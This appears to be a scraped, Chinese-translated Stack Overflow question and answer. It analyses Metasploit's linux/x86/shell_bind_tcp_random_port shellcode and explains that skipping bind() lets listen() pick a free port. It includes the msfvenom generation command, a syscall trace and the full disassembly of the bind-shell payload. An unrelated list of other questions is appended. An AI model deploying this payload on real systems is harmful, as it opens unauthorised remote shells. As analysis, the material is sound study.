个人中心
文章发布
退出
作者热门文章
- android - 多次调用 OnPrimaryClipChangedListener
- android - 无法更新 RecyclerView 中的 TextView 字段
- android.database.CursorIndexOutOfBoundsException : Index 0 requested, 光标大小为 0
- android - 使用 AppCompat 时,我们是否需要明确指定其 UI 组件(Spinner、EditText)颜色
25
4
我没有看到它在有效负载 shell_bind_tcp_random_port 的代码中设置端口的位置
$ sudo msfvenom --platform linux -p linux/x86/shell_bind_tcp_random_port -f raw | sctest -vvv -Ss 10000 -G shell-bind-tcp-random.dot
graph file shell-bind-tcp-random.dot
verbose = 3
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 57 bytes
int socket (
int domain = 2;
int type = 1;
int protocol = 0;
) = 14;
int listen (
int s = 14;
int backlog = 0;
) = 0;
int accept (
int sockfd = 14;
sockaddr_in * addr = 0x00000000 =>
none;
int addrlen = 0x00000002 =>
none;
) = 19;
int dup2 (
int oldfd = 19;
int newfd = 14;
) = 14;
... output truncated ...
int dup2 (
int oldfd = 19;
int newfd = 0;
) = 0;
int execve (
const char * dateiname = 0x00416fb6 =>
= "/bin//sh";
const char * argv[] = [
= 0xffffffff =>
none;
];
const char * envp[] = 0x00000000 =>
none;
) = 0;
汇编代码为:
00000000 31DB xor ebx,ebx
00000002 F7E3 mul ebx
00000004 B066 mov al,0x66
00000006 43 inc ebx
00000007 52 push edx
00000008 53 push ebx
00000009 6A02 push byte +0x2
0000000B 89E1 mov ecx,esp
0000000D CD80 int 0x80
0000000F 52 push edx
00000010 50 push eax
00000011 89E1 mov ecx,esp
00000013 B066 mov al,0x66
00000015 B304 mov bl,0x4
00000017 CD80 int 0x80
00000019 B066 mov al,0x66
0000001B 43 inc ebx
0000001C CD80 int 0x80
0000001E 59 pop ecx
0000001F 93 xchg eax,ebx
00000020 6A3F push byte +0x3f
00000022 58 pop eax
00000023 CD80 int 0x80
00000025 49 dec ecx
00000026 79F8 jns 0x20
00000028 B00B mov al,0xb
0000002A 682F2F7368 push dword 0x68732f2f
0000002F 682F62696E push dword 0x6e69622f
00000034 89E3 mov ebx,esp
00000036 41 inc ecx
00000037 CD80 int 0x80
__NR_socketcall 默认使用随机端口吗?
我没有看到它在有效负载 shell_bind_tcp_random_port 的代码中设置端口的位置
最佳答案
我相信代码的前半部分包含您的答案。
00000000 31DB xor ebx,ebx
00000002 F7E3 mul ebx
00000004 B066 mov al,0x66
00000006 43 inc ebx
00000007 52 push edx
00000008 53 push ebx
00000009 6A02 push byte +0x2
0000000B 89E1 mov ecx,esp
以上部分使用 0x66(102 ) 即 sys_socketcall . EBX 设置为 1,所以我们正在执行 equivalent的 sys_socket .在这种情况下,our_socket = socket ( AF_INET , SOCK_STREAM , IPPROTO_IP ) 将使用这些参数创建一个 TCP 套接字。
下一步是:
0000000F 52 push edx
00000010 50 push eax
00000011 89E1 mov ecx,esp
00000013 B066 mov al,0x66
00000015 B304 mov bl,0x4
00000017 CD80 int 0x80
我们再次执行 sys_socketcall,但 BL 设置为 4。这是 equivalent的 sys_listen .在这种情况下,它将是 sys_listen (our_socket, 0) 开始监听我们的套接字。
需要注意的是这段代码没有使用传统的socket/bind/listen方法。它完全跳过了 bind 调用。在 Linux 上,如果您不在套接字上执行 bind 操作,listen 将隐式假定要绑定(bind)端口 0。绑定(bind) port 0 指示 Linux 搜索可用的非特权端口进行绑定(bind)。我不会认为返回的是随机端口,但它只是系统根据内部算法找到的第一个无特权且可用/未使用的端口。
关于linux - __NR_socketcall 默认使用随机端口吗?,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/32488813/
25
4
0
我让随机数低于之前的随机数。 if Airplane==1: while icounter0: print "You have enoph fuel to get to New
是否可以生成 BigFloat 的随机数?类型均匀分布在区间 [0,1)? 我的意思是,因为 rand(BigFloat)不可用,看来我们必须使用 BigFloat(rand())为了那个结局。然而,
我正在尝试学习 Kotlin,所以我正在学习互联网上的教程,其中讲师编写了一个与他们配合良好的代码,但它给我带来了错误。 这是错误 Error:(26, 17) Kotlin: Cannot crea
是否有任何方法可以模拟 Collections.shuffle 的行为,而不使比较器容易受到排序算法实现的影响,从而保证结果的安全? 我的意思是不违反类似的契约(Contract)等.. 最佳答案 在
我正在创建一个游戏,目前必须处理一些math.random问题。 我的Lua能力不是那么强,你觉得怎么样 您能制定一个使用 math.random 和给定百分比的算法吗? 我的意思是这样的函数: fu
我想以某种方式让按钮在按下按钮时随机改变位置。我有一个想法如何解决这个问题,其中一个我在下面突出显示,但我已经认为这不是我需要的。 import javafx.application.Applicat
对于我的 Java 类(class),我应该制作一个随机猜数字游戏。我一直陷入过去几天创建的循环中。程序的输出总是无限循环,我不明白为什么。非常感谢任何帮助。 /* This program wi
我已经查看了涉及该主题的一些其他问题,但我没有在任何地方看到这个特定问题。我有一个点击 Web 元素的测试。我尝试通过 ID 和 XPath 引用它,并使用 wait.until() 等待它变得可见。
我在具有自定义类的字典和列表中遇到了该异常。示例: List dsa = (List)Session["Display"]; 当我使用 Session 时,转换工作了 10-20 次..然后它开始抛
需要帮助以了解如何执行以下操作: 每隔 2 秒,这两个数字将生成包含从 1 到 3 的整数值的随机数。 按下“匹配”按钮后,如果两个数字相同,则绿色标签上的数字增加 1。 按下“匹配”按钮后,如果两个
void getS(char *fileName){ FILE *src; if((src = fopen(fileName, "r")) == NULL){ prin
如果我有 2 个具有以下字段的 MySQL 数据库... RequestDB: - Username - Category DisplayDB: - Username - Category
我有以下语句 select random() * 999 + 111 from generate_series(1,10) 结果是: 690,046183290426 983,732229881454
我有一个使用 3x4 CSS 网格构建的简单网站。但出于某种原因,当我在 chrome“检查”中检查页面时,有一个奇怪的空白 显然不在我的代码中的标签。 它会导致网站上出现额外的一行,从而导致出现
我有两个动画,一个是“过渡”,它在悬停时缩小图像,另一个是 animation2,其中图像的不透明度以周期性间隔重复变化。 我有 animation2 在图像上进行,当我将鼠标悬停在它上面时,anim
如图所示post在 C++ 中有几种生成随机 float 的方法。但是我不完全理解答案的第三个选项: float r3 = LO + static_cast (rand()) /( static_c
我正在尝试将类添加到具有相同类的三个 div,但我不希望任何被添加的类重复。 我有一个脚本可以将一个类添加到同时显示的 1、2 或 3 个 div。期望的效果是将图像显示为背景图像,并且在我的样式表中
我有一个基本上可以工作的程序,它创建由用户设置的大小的嵌套列表,并根据用户输入重复。 但是,我希望各个集合仅包含唯一值,目前这是我的输出。 > python3 testv.py Size of you
我正在尝试基于 C# 中的种子生成一个数字。唯一的问题是种子太大而不能成为 int32。有什么方法可以像种子一样使用 long 吗? 是的,种子必须很长。 最佳答案 这是我移植的 Java.Util.
我写这个函数是为了得到一个介于 0 .. 1 之间的伪随机 float : float randomFloat() { float r = (float)rand()/(float)RAN
我是一名优秀的程序员,十分优秀!